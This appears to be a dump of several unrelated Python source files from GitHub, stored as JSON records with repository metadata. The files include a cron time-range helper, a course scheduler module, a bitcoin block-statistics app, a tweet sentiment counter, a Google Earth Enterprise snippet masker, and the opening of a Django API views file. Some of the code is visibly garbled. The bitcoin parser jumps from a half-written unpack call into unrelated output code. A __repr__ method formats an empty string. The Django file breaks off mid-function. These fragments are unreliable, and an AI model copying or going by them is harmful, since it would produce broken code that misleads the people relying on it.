cron_str: str, tz_str: str, delta_str: str):\n if not tz_str:\n raise InvalidTZ(tz_str)\n if not cron_str:\n raise InvalidCron(cron_str)\n if not delta_str:\n raise InvalidDelta(delta_str)\n\n tz = gettz(tz_str)\n if not isinstance(tz, ValidTZ):\n raise InvalidTZ(tz_str)\n self.__tz = tz\n\n if not croniter.is_valid(cron_str):\n raise InvalidCron(cron_str)\n self.__cron = croniter(cron_str, datetime.now(tz))\n\n delta = timeparse(delta_str, granularity=\"minutes\")\n if not isinstance(delta, int):\n raise InvalidDelta(delta_str)\n self.__delta = timedelta(seconds=delta)\n\n def __normalize_to_now(self) -> datetime:\n \"\"\"\n Set current croniter to use `datetime.now` with the configured timezone.\n Return the created datetime.\n \"\"\"\n now = datetime.now(tz=self.__tz)\n self.__cron.set_current(start_time=now)\n return now\n\n def now_in_range(self):\n now = self.__normalize_to_now()\n last = self.__cron.get_prev(datetime)\n # LOG.debug(\"%s %s %s\", now, last, last + self.__delta)\n\n return last <= now < (last + self.__delta)\n\n def get_starts(self, n: int = 3) -> Generator[datetime, None, None]:\n self.__normalize_to_now()\n for _ in range(n):\n yield self.__cron.get_next(datetime)\n\n def get_ranges(\n self, n: int = 3\n ) -> Generator[Tuple[datetime, datetime], None, None]:\n self.__normalize_to_now()\n for _ in range(n):\n nxt = self.__cron.get_next(datetime)\n yield (nxt, nxt + self.__delta)\n","repo_name":"gregdan3/ilo-pi-toki-pona-taso","sub_path":"src/tenpo/croniter_utils.py","file_name":"croniter_utils.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10296119872","text":"from pyconstraints import is_nil\n\nfrom courses.utils import DAYS, sorted_daysofweek\n\nfrom scheduler.scheduling import compute_schedules as _compute_schedules\n\n\nclass ConflictCache(object):\n _EMPTY_SET = frozenset()\n\n def __init__(self, conflict_mapping):\n self.conflict_mapping = conflict_mapping\n\n def __repr__(self):\n return \"\" % self.conflict_mapping\n\n def __key__(self, section_id):\n return self.conflict_mapping.get(section_id, self._EMPTY_SET)\n\n def __call__(self, section1, section2):\n if is_nil(section1) or is_nil(section2):\n return True\n self.section_conflicts(section1.id, section2.id)\n\n def section_conflicts(self, section1_id, section2_id):\n return (\n section2_id in self[section1_id] or\n section1_id in self[section2_id]\n )\n\n\ndef has_schedule(selected_courses, section_constraint=None):\n schedules = _compute_schedules(\n selected_courses,\n free_sections_only=False,\n generator=True,\n section_constraint=section_constraint)\n for schedule in schedules:\n return True\n return False\n\n\ndef compute_schedules(selected_courses, section_constraint=None):\n \"\"\"Returns the schedules in a JSON-friendly format.\n\n Returns a list of dictionary of course id to crns.\n \"\"\"\n schedules = _compute_schedules(\n selected_courses,\n free_sections_only=False\n )\n results = []\n for schedule in schedules:\n s = {}\n for course, section in schedule.items():\n s[str(course.id)] = section.id\n results.append(s)\n return results\n\n\ndef period_stats(periods):\n if len(periods) < 1:\n return range(8, 20), DAYS[:5]\n min_time, max_time, dow_used = None, None, set()\n for period in periods:\n min_time = min(min_time or period.start, period.start)\n max_time = max(max_time or period.end, period.end)\n dow_used = dow_used.union(period.days_of_week)\n\n timerange = range(min_time.hour - 1, max_time.hour + 2)\n return list(timerange), sorted_daysofweek(dow_used)\n","repo_name":"jeffh/YACS","sub_path":"scheduler/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"86"} +{"seq_id":"41590864327","text":"import argparse\nimport asyncio\nimport configparser\nimport logging\nimport signal\nimport sys\nimport traceback\nfrom setproctitle import setproctitle\nimport time\nimport asyncpg\nimport colorlog\nimport pybtc\nimport db_model\nfrom collections import deque\nfrom struct import pack, unpack\nfrom pybtc import int_to_c_int, var_int_to_int, parse_script, int_to_var_int, read_var_int\nfrom pybtc import double_sha256\nfrom math import ceil\nimport uvloop\nasyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n\n\n\ndef read_c_int(stream, base_bytes=1):\n \"\"\"\n Convert compressed integer bytes to integer\n\n :param b: compressed integer bytes.\n :param base_bytes: len of bytes base from which start compression.\n :return: integer.\n \"\"\"\n b = bytearray(stream.read(1))\n byte_length = f = 0\n while True:\n v = b[f]\n if v == 0xff:\n byte_length += 8\n f += 1\n b += stream.read(1)\n continue\n while v & 0b10000000:\n byte_length += 1\n v = v << 1\n break\n b += stream.read(byte_length+base_bytes - f)\n return b\n\n\nclass Transaction(dict):\n \"\"\"\n The class for Transaction object\n\n :param raw_tx: (optional) raw transaction in bytes or HEX encoded string, if no raw transaction provided\n well be created new empty transaction template.\n :param tx_format: \"raw\" or \"decoded\" format. Raw format is mean that all transaction represented in bytes\n for best performance.\n Decoded transaction is represented in human readable format using base68, hex, bech32,\n asm and opcodes. By default \"decoded\" format using.\n :param int version: transaction version for new template, by default 1.\n :param int lock_time: transaction lock time for new template, by default 0.\n :param boolean testnet: address type for \"decoded\" transaction representation.\n\n \"\"\"\n\n def __init__(self, raw_tx=None, format=\"decoded\", version=1,\n lock_time=0, testnet=False, auto_commit=True, keep_raw_tx=False, c_int=False):\n if format not in (\"decoded\", \"raw\"):\n raise ValueError(\"format error, raw or decoded allowed\")\n self.auto_commit = auto_commit\n self[\"format\"] = format\n self[\"testnet\"] = testnet\n self[\"segwit\"] = False\n self[\"txId\"] = None\n self[\"hash\"] = None\n self[\"version\"] = version\n self[\"size\"] = 0\n self[\"vSize\"] = 0\n self[\"bSize\"] = 0\n self[\"lockTime\"] = lock_time\n self[\"vIn\"] = dict()\n self[\"vOut\"] = dict()\n self[\"rawTx\"] = None\n self[\"blockHash\"] = None\n self[\"confirmations\"] = None\n self[\"time\"] = None\n self[\"blockTime\"] = None\n self[\"blockIndex\"] = None\n self[\"coinbase\"] = False\n self[\"fee\"] = None\n self[\"data\"] = None\n self[\"amount\"] = None\n if raw_tx is None:\n return\n\n self[\"rawTx\"] = deque()\n rtx = self[\"rawTx\"].append\n self[\"amount\"] = 0\n sw = sw_len = 0\n stream = self.get_stream(raw_tx)\n start = stream.tell()\n read = stream.read\n tell = stream.tell\n if not c_int:\n # start deserialization\n t = read(4)\n rtx(t)\n self[\"version\"] = unpack(' %s %% \" % (self.timeline_size_v_int - self.timeline_size_c_int,\n round((self.timeline_size_v_int - self.timeline_size_c_int)\n / self.timeline_size_v_int * 100, 2)))\n print(len(self.block_batch))\n\n\n async def commit(self):\n batch = None\n while True:\n if batch is None:\n batch = deque(self.block_batch)\n self.block_batch = deque()\n if batch:\n async with self.db_pool.acquire() as conn:\n async with conn.transaction():\n\n await conn.copy_records_to_table('blocks',\n columns=[\"height\", \"timestamp\",\n \"size_c_int\", \"timeline_size_c_int\",\n \"size_v_int\", \"timeline_size_v_int\"],\n records=batch)\n else:\n await asyncio.sleep(1)\n batch = None\n\n\n\n async def orphan_block_handler(self, orphan_height):\n pass\n\n\n async def new_block_handler(self, block, conn):\n pass\n\n\n\n async def new_transaction_handler(self, tx, timestamp, conn):\n pass\n\n\n\n def _exc(self, a, b, c):\n return\n\n\n def terminate(self, a, b):\n if not self.shutdown:\n self.shutdown = True\n self.loop.create_task(self.terminate_coroutine())\n else:\n self.log.critical(\"Shutdown in progress please wait ...\")\n\n\n async def terminate_coroutine(self):\n sys.excepthook = self._exc\n self.log.error('Stop request received')\n if self.connector:\n self.log.warning(\"Stop node connector\")\n await self.connector.stop()\n\n self.log.warning('sync worker stop request received')\n [process.terminate() for process in self.processes]\n [task.cancel() for task in self.tasks]\n if self.tasks: await asyncio.wait(self.tasks)\n\n try: await self.db_pool.close()\n except: pass\n\n self.log.info(\"server stopped\")\n self.loop.stop()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"bitcoin compressed int chart v 0.0.1\")\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-c\", \"--config\", help = \"config file\", type=str, nargs=1, metavar=('PATH',))\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\", action=\"count\", default=0)\n parser.add_argument(\"-w\", \"--connector\", help=\"increase output verbosity for connector\",\n action=\"count\",\n default=0)\n args = parser.parse_args()\n config_file = \"../config/bitcoin-compressed-int-chart.conf\"\n log_level = logging.WARNING\n logger = logging.getLogger(\"server\")\n logger_connector = logging.getLogger(\"connector\")\n if args.config is not None:\n config_file = args.config[0]\n config = configparser.ConfigParser()\n config.read(config_file)\n if args.verbose > 0:\n log_level = logging.INFO\n if args.verbose > 1:\n log_level = logging.DEBUG\n\n connector_log_level = logging.INFO\n if args.connector > 0:\n connector_log_level = logging.WARNING\n if args.connector > 1:\n connector_log_level = logging.INFO\n if args.connector > 2:\n connector_log_level = logging.DEBUG\n\n ch = logging.StreamHandler()\n formatter = colorlog.ColoredFormatter('%(log_color) s%(asctime)s: %(message)s')\n formatter = colorlog.ColoredFormatter(\n '%(log_color)s%(asctime)s %(levelname)s: %(message)s (%(module)s:%(lineno)d)')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger_connector.addHandler(ch)\n\n\n # check config\n try:\n config[\"CONNECTOR\"][\"zeromq\"]\n config[\"CONNECTOR\"][\"rpc\"]\n config[\"POSTGRESQL\"][\"dsn\"]\n config[\"POSTGRESQL\"][\"pool_threads\"]\n try:\n connector_log_level = log_level_map[config[\"CONNECTOR\"][\"log_level\"]]\n except:\n pass\n\n try:\n log_level = log_level_map[config[\"SERVER\"][\"log_level\"]]\n except:\n pass\n\n except Exception as err:\n logger.critical(\"Configuration failed: %s\" % err)\n logger.critical(\"Shutdown\")\n logger.critical(str(traceback.format_exc()))\n sys.exit(0)\n connector_log_level = logging.DEBUG\n log_level = logging.DEBUG\n logger.setLevel(log_level)\n logger_connector.setLevel(connector_log_level)\n loop = asyncio.get_event_loop()\n app = App(loop, logger, logger_connector, config)\n loop.run_forever()\n\n pending = asyncio.Task.all_tasks()\n for task in pending:\n task.cancel()\n if pending:\n loop.run_until_complete(asyncio.wait(pending))\n loop.close()\n\n","repo_name":"bitaps-com/bitcoin-compressed-int-chart","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7476725429","text":"import codecs\nimport numpy\nimport math\n\n# This program takes a file of parsed tweets (output of ExtractTweetData.py),\n# identifies the locales (cities) represented in the data, and, for each locale,\n# counts the frequency and average message sentiment score for each term (word)\n# included in an input list (e.g., \"EducationTerms.txt\").\n#\n# The output is given as a set of large tables, showing the statistics for each\n# term of interest in each locale.\n#\n# How to fill an array with zeroes from: http://stackoverflow.com/questions/4056768/how-to-declare-array-of-zeros-in-python-or-an-array-of-a-certain-size\n# Python readlines error with unicode and a workaround from: http://bugs.python.org/issue15278\n\nextractedTweets = \"\"\nqueryTerms = \"EducationTerms.txt\" # Input terms (words)\n # whose incidence you wish to calculate\n\n## Calculates counts and basic statistics for the terms of interest included\n## in the query, in the different locations indicated in the input list of\n## locales.\n\ndef countQueryInstances (parsedTweetsFile, queryTermsArray, theLocalesArray):\n\n queryCounts = []\n queryScores = []\n numTweets = []\n scoreTweets = []\n indivTweets = []\n indivScores = []\n stdevArray = []\n stderrArray = []\n stdevOverall = []\n stderrOverall = []\n \n for i in range(0,len(theLocalesArray)):\n queryCounts.append([0] * len(queryTermsArray)) # Number of tweets where query term is found\n queryScores.append([0.0] * len(queryTermsArray)) # Composite score of tweets where query term is found\n indivScores.append([0] * len(queryTermsArray))\n stdevArray.append([0.0]*len(queryTermsArray))\n stderrArray.append([0.0]*len(queryTermsArray))\n numTweets.append(0) # Total number of tweets\n scoreTweets.append(0.0) # Composite score of all tweets\n indivTweets.append(0.0)\n stdevOverall.append(0.0)\n stderrOverall.append(0.0)\n\n for i in range(0,len(theLocalesArray)):\n indivTweets[i] = []\n for j in range(0,len(queryTermsArray)):\n indivScores[i][j] = []\n\n counter = 0\n \n for line in parsedTweetsFile:\n \n try:\n line = line.decode(encoding = \"utf-8\")\n lineArray = line.split(\"\\t\") # Input file is preprocessed to remove\n \n if lineArray[11] in theLocalesArray:\n\n index = theLocalesArray.index(lineArray[11])\n \n messageList = lineArray[2].split() # any tabs or newlines in the messages\n \n alreadyFoundFlags = [False] * len(queryTermsArray) # Flags to ensure that messages\n # having the same term twice are not\n # double-counted\n \n for i in range(0, len(messageList)): # For each word in the message...\n messageList[i] = messageList[i].strip(\".!?-~@$#%^&*(){}[]\\|:;,`+=_/\")\n ngram = messageList[i].encode(\"ascii\",\"ignore\")\n ngram = ngram.lower()\n \n for j in range(0,len(queryTermsArray)): # Check each term in the query list to see if it matches the focal word\n if alreadyFoundFlags[j] == False: # If the query term has already been found in this message, don't check again\n if ngram == queryTermsArray[j]:\n queryCounts[index][j] += 1\n queryScores[index][j] += int(lineArray[-1]) # Get the affect score of the message\n alreadyFoundFlags[j] = True\n indivScores[index][j].append(float(int(lineArray[-1]))) \n numTweets[index] += 1\n scoreTweets[index] += int(lineArray[-1])\n indivTweets[index].append(float(int(lineArray[-1])))\n except UnicodeEncodeError:\n print(\"UnicodeEncodeError\")\n print(repr(line))\n print(lineArray[-1])\n print(str(len(lineArray)))\n break\n except ValueError:\n print(\"ValueError\")\n print(repr(line))\n print(lineArray[-1])\n print(str(len(lineArray)))\n\n for i in range(0,len(theLocalesArray)):\n stdevOverall[i] = numpy.std(numpy.array(indivTweets[i]))\n stderrOverall[i] = stdevOverall[i]/math.sqrt(float(numTweets[i]))\n for j in range(0,len(queryTermsArray)):\n stdevArray[i][j] = numpy.std(numpy.array(indivScores[i][j]))\n stderrArray[i][j] = stdevArray[i][j]/math.sqrt(float(queryCounts[i][j]))\n \n return queryCounts, queryScores, numTweets, scoreTweets, stdevArray, stderrArray, stdevOverall, stderrOverall\n\n## Identify all the locales in the input tweet file and make a list of them\n## for subsequent use.\n\ndef populateLocales(tweetFileName):\n\n myLocalesArray = []\n tweetFile = open(tweetFileName, mode = \"rU\")\n \n for line in tweetFile:\n line = line.decode(encoding = \"utf-8\")\n lineArray = line.split(\"\\t\")\n\n if lineArray[10] == \"city\" and lineArray[12].split()[-1] == \"CA\":\n if lineArray[11] not in myLocalesArray:\n myLocalesArray.append(lineArray[11].encode(\"ascii\",\"ignore\"))\n\n tweetFile.close()\n\n return myLocalesArray\n \n \ndef main():\n\n queryArray = []\n\n queryFile = open(queryTerms, mode = \"rU\")\n\n # Read query terms into array\n \n for line in queryFile:\n queryArray.append(line.strip())\n\n queryFile.close()\n \n localesArray = populateLocales(extractedTweets)\n\n #localesArray = [\"Oakland\", \"Palo Alto\", \"East Palo Alto\", \"San Francisco\", \"San Jose\",\"Menlo Park\"]\n\n # Open file of parsed tweets as utf-8. I've taken care to preserve the\n # utf-8 encoding so that emoticons and foreign characters can be recovered,\n # though the current implementation does not take advantage of this\n # (hopefully will in the future).\n\n tweetsFile = open(extractedTweets, mode = \"rU\")\n \n queryCounts, queryScores, totalTweets, totalScores, stdevs, stderrs, stdevO, stderrO = countQueryInstances(tweetsFile, queryArray, localesArray)\n\n overallAverageScores = []\n\n for i in range(0,len(localesArray)):\n\n if (totalTweets[i] > 0):\n overallAverageScores.append(totalScores[i]/float(totalTweets[i]))\n else:\n overallAverageScores.append(\"undef\")\n print(\"Place with zero tweets: \" + localesArray[i])\n\n # Write the output to a file in tabular format\n\n outFileName = extractedTweets[0:-4] + \"_results_full.txt\"\n\n outFile = open(outFileName, mode = \"w\")\n\n outFile.write(\"OVERALL\\n\")\n outFile.write(\"Metric\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Total tweets\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(totalTweets[i]) + \"\\t\") \n\n outFile.write(\"\\n\")\n outFile.write(\"Aggregate score\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(totalScores[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Average score\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(overallAverageScores[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Stdev\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(stdevO[i]) + \"\\t\")\n\n outFile.write(\"\\n\")\n outFile.write(\"Std err\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(str(stderrO[i]) + \"\\t\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"COUNT\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(queryCounts[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"FREQUENCY\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n if (totalTweets[j] > 0):\n outFile.write(str(float(queryCounts[j][i])/float(totalTweets[j])) + \"\\t\")\n else:\n outFile.write(\"undef\\t\") \n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"AGGREGATE SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(queryScores[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"AVERAGE SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n # --> START HERE, NEED TO CALCULATE AVERAGES\n\n averagesArray = []\n normsArray = []\n\n for i in range(0,len(localesArray)):\n averagesArray.append([0.0] * len(queryArray))\n normsArray.append([0.0] * len(queryArray))\n\n for i in range(0,len(localesArray)):\n for j in range(0,len(queryArray)):\n if queryCounts[i][j] > 0:\n averagesArray[i][j]=str(queryScores[i][j]/float(queryCounts[i][j]))\n if overallAverageScores[i] > 0:\n normsArray[i][j]=str((queryScores[i][j]/float(queryCounts[i][j]))/(overallAverageScores[i]))\n else:\n normsArray[i][j]=\"undef\"\n else:\n averagesArray[i][j]=\"undef\"\n normsArray[i][j]=\"undef\"\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(averagesArray[j][i] + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"STANDARD DEVIATION OF SCORES\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(stdevs[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"STANDARD ERROR OF SCORES\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(str(stderrs[j][i]) + \"\\t\")\n outFile.write(\"\\n\")\n\n outFile.write(\"\\n\\n\")\n outFile.write(\"NORMALIZED SCORE\\n\")\n outFile.write(\"Term\\t\")\n\n for i in range(0,len(localesArray)):\n outFile.write(localesArray[i] + \"\\t\")\n\n outFile.write(\"\\n\")\n\n for i in range(0,len(queryArray)):\n outFile.write(queryArray[i] + \"\\t\")\n for j in range(0,len(localesArray)):\n outFile.write(normsArray[j][i] + \"\\t\")\n outFile.write(\"\\n\")\n \n outFile.close()\n tweetsFile.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"eabrash/Emi-Programs","sub_path":"ParsedTweetReader.py","file_name":"ParsedTweetReader.py","file_ext":"py","file_size_in_byte":11844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"30039735327","text":"from serve.snippets.data import hard_masked_snippets\nfrom serve.snippets.data import masked_snippets\nfrom serve.snippets.util import dbroot_utils\nfrom serve.snippets.util import path_converters\nfrom serve.snippets.util import path_utils\nfrom serve.snippets.util import proto_reflection\nfrom serve.snippets.util import sparse_tree\n\n# TODO: should fold this google.* into proto_reflection\nimport google.protobuf.descriptor\n\n\ndef ForcedFieldValues(log):\n \"\"\"loads + returns fields that are to be forced, with their values.\n\n Args:\n log: logging obj.\n Returns:\n Set of fields paths user should never see or touch.\n \"\"\"\n if not ForcedFieldValues.cached:\n ForcedFieldValues.cached = _LoadPathValuesFromDict(\n hard_masked_snippets.hard_masked_snippets, log)\n return ForcedFieldValues.cached\n# Simple, full path -> value; no attempt at representing them as a 'tree'.\nForcedFieldValues.cached = {}\n\n\ndef HardSuppressedFields(log):\n \"\"\"Set, of fields that are hardwired + out of reach of the user.\n\n Their values are forced into the protobuf; the user never gets to see them.\n\n Args:\n log: logging obj.\n Returns:\n Set of fields paths user should never see or touch.\n \"\"\"\n return set(ForcedFieldValues(log).keys())\n\n\ndef NerfedDefaultFieldValues(log):\n \"\"\"loads + returns the nerfed default field values.\n\n These are fields which have defaults baked into the protobuf's\n definition which are inconvenient for Google (mostly, urls that\n point at google.com). This is a list of these, with values to set\n them to, instead. The user can see and change them, and indeed,\n could set them back to 'inconvenient' values, but we prevent that\n from happening, by default.\n\n Args:\n log: logging obj.\n Returns:\n dict, of nerfed value by fieldpath.\n \"\"\"\n if not NerfedDefaultFieldValues.cached:\n NerfedDefaultFieldValues.cached = _LoadPathValuesFromDict(\n masked_snippets.masked_snippets, log)\n return NerfedDefaultFieldValues.cached\n# Simple, full path -> value; no attempt at representing them as a 'tree'.\nNerfedDefaultFieldValues.cached = {}\n\n\ndef _FlexibleBool(bool_text):\n \"\"\"Tolerant boolean text.\n\n Args:\n bool_text: the bool text.\n\n Returns:\n Boolean value of text.\n\n Raises:\n ValueError: if the text bool isn't recognized.\n \"\"\"\n as_lower = bool_text.lower()\n if as_lower in _FlexibleBool.TEXT_TRUES:\n return True\n elif as_lower in _FlexibleBool.TEXT_FALSES:\n return False\n else:\n raise ValueError(\"Can't convert '%s' to bool\" % bool_text)\n_FlexibleBool.TEXT_TRUES = set([\"yes\", \"y\", \"true\", \"t\", \"on\", \"1\"])\n_FlexibleBool.TEXT_FALSES = set([\"no\", \"n\", \"false\", \"f\", \"off\", \"0\"])\n\n\ndef _LoadPathValuesFromDict(snippets, log):\n \"\"\"Loads {fieldpath: value} from dictionary.\n\n Verifies field path spelling and demangle it into valid protobuf source\n form.\n a.b.c:value -> a.b.c.value\n\n Args:\n snippets: snippets path:value map.\n log: logging obj.\n Returns:\n A dict, of value, by fieldpath.\n \"\"\"\n hardwired_values = {}\n for mangled_path, value in snippets.iteritems():\n # Allow for value being multi-word. of course is 'abstract',\n # ie looks like 'a.b.c', no [] or indices.\n log.debug(\"field:[%s], value:[%s]\", mangled_path, str(value))\n log.debug(\"maybe mangled: %s\", mangled_path)\n path = path_converters.Demangled(mangled_path)\n log.debug(\"path: %s\", path)\n if not proto_reflection.IsLegitFieldPath(path):\n log.warning(\n \"The path '%s' is misspelled or otherwise does not exist.\"\n \" Skipping.\", path)\n continue\n\n if not path_utils.IsAbstract(path):\n log.warning(\n \"The above path is expected to be abstract (no \\'[\\', \\']\\'\"\n \" or indices).\")\n\n # Assure the end_snippet prefix\n path = path_utils.EnsureFull(path)\n field_type = proto_reflection.TypeAtFieldPath(\n dbroot_utils.MakeEmptyDbroot(), path)\n\n log.debug(\"field:[%s], value:[%s]\", path, str(value))\n if field_type == google.protobuf.descriptor.FieldDescriptor.TYPE_BOOL:\n if isinstance(value, str):\n value = _FlexibleBool(value)\n log.debug(\"path getting bool default: %s: %s\", path, str(value))\n\n hardwired_values[path] = value\n return hardwired_values\n\n\ndef RemoveSuppressedFields(store, log):\n \"\"\"Takes fields out of the sparse tree that is on its way to the client-side.\n\n Args:\n store: multi-level dict representing the end_snippet.\n log: logging obj.\n \"\"\"\n # plain {path -> value}, not sparse\n log.debug(\">suppress_fields\")\n\n # 'unnerf' - why do we do this...?\n # _unnerf(store, log)\n\n for path in HardSuppressedFields(log):\n log.debug(\"path... \" + path)\n log.debug(\"removing if present... \" + path)\n if sparse_tree.HasAbstractFieldPath(path, store):\n # TODO: why do we split finding + removing?\n sparse_tree.RemoveAbstractField(path, store)\n log.debug(\" value, not sparse\n path_values = ForcedFieldValues(log)\n # JGD arg; need to gussy up these abstract paths with repeated markers.\n log.debug(\"have %d fields to force\", len(path_values))\n for abstract_path, value in path_values.iteritems():\n log.debug(\"finding concrete paths for: %s\", abstract_path)\n # Just changing the form for the next call.\n empty_concrete_path = proto_reflection.EmptyConcretizeFieldPath(\n abstract_path)\n log.debug(\"empty_concrete_path: %s\", empty_concrete_path)\n if empty_concrete_path:\n sparse_tree.SetAbstractField(empty_concrete_path, value, store, log)\n\n\ndef NerfUnwantedExposedDefaults(store, log):\n \"\"\"Adds nerfed values to unsafe / inconvenient fields in the 'store'.\n\n Lit of snippets which default values need to be reseted in proto dbroot.\n Function collects these snippets in store and changes default values to an\n acceptable value.\n The canonical example is urls that point to Google servers, but there are\n others.\n\n Args:\n store: multi-level dict mimicking the end_snippets protobuf.\n log: logging obj.\n \"\"\"\n log.debug(\"Collect and mask unwanted defaults...\")\n # plain path -> value, not sparse\n path_values = NerfedDefaultFieldValues(log)\n log.debug(\"... pathes loaded.\")\n for path, value in path_values.iteritems():\n log.debug(\"..has?\" + path)\n if not sparse_tree.HasAbstractFieldPath(path, store):\n log.debug(\"..set?\" + path)\n sparse_tree.SetAbstractField(path, value, store, log)\n log.debug(\"Masked fields collected.\")\n\n\ndef main():\n pass\n # log = logging_setup.init_logger(\"snippet-vetting.log\", logging.DEBUG)\n # snippets = _LoadPathValuesFromDict(\n # hard_masked_snippets.hard_masked_snippets, log)\n # print snippets\n #\n # just sanity checking. Probably is out-of-date.\n # log = logging_setup.init_logger(\"snippet-vetting.log\", logging.DEBUG)\n # _LoadPathValues(configuration.SNIPPET_NERF_FILEPATH, log)\n # _LoadPathValues(configuration.SNIPPET_HARDMASK_FILEPATH, log)\n # nerf_unwanted_exposed_defaults({}, log)\n # force_fields({}, log)\n # remove_suppressed_fields({}, log)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"google/earthenterprise","sub_path":"earth_enterprise/src/server/wsgi/serve/snippets/util/snippet_masker.py","file_name":"snippet_masker.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":2622,"dataset":"github-code","pt":"86"} +{"seq_id":"32705003472","text":"# Create your views here.\nimport decimal\n\nimport csv\nimport json\nimport uuid\nfrom decimal import Decimal\n\nfrom datetime import datetime, timedelta\nimport dateutil.parser\nimport pytz\nimport requests\nimport stripe\nfrom django.contrib import messages\nfrom django.contrib.auth.models import Group\nfrom django.core.exceptions import ValidationError\nfrom django.core import management\n\nfrom django.core.validators import URLValidator\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.utils import timezone\nfrom django.views import View\nfrom django.views.generic import TemplateView\nfrom django_tenants.utils import schema_context, tenant_context\nfrom rest_framework import serializers\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.text import slugify\nfrom rest_framework.views import APIView\n\nfrom ApiBillet.serializers import EventSerializer, PriceSerializer, ProductSerializer, ReservationSerializer, \\\n ReservationValidator, MembreValidator, ConfigurationSerializer, NewConfigSerializer, \\\n EventCreateSerializer, TicketSerializer, OptionsSerializer, ChargeCashlessValidator, NewAdhesionValidator, \\\n DetailCashlessCardsValidator, DetailCashlessCardsSerializer, CashlessCardsValidator, \\\n UpdateFederatedAssetFromCashlessValidator\nfrom AuthBillet.models import TenantAdminPermission, TibilletUser, RootPermission, TenantAdminPermissionWithRequest\nfrom AuthBillet.utils import user_apikey_valid, get_or_create_user\nfrom BaseBillet.tasks import create_ticket_pdf, report_to_pdf, report_celery_mailer\nfrom Customers.models import Client, Domain\nfrom BaseBillet.models import Event, Price, Product, Reservation, Configuration, Ticket, Paiement_stripe, \\\n OptionGenerale, Membership\nfrom rest_framework import viewsets, permissions, status\nfrom django.db import connection, IntegrityError\nfrom TiBillet import settings\n\nimport os\n\nfrom MetaBillet.models import EventDirectory, ProductDirectory\nfrom PaiementStripe.views import new_entry_from_stripe_invoice\nfrom QrcodeCashless.models import Detail, CarteCashless, Wallet, Asset, SyncFederatedLog\nfrom QrcodeCashless.views import WalletValidator\nfrom root_billet.models import RootConfiguration\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return str(o)\n return super(DecimalEncoder, self).default(o)\n\n\n# Refactor for get_permission\n# Si c'est list/retrieve -> pour tout le monde\n# Sinon, on vérifie la clé api\ndef get_permission_Api_LR_Any(self):\n # Si 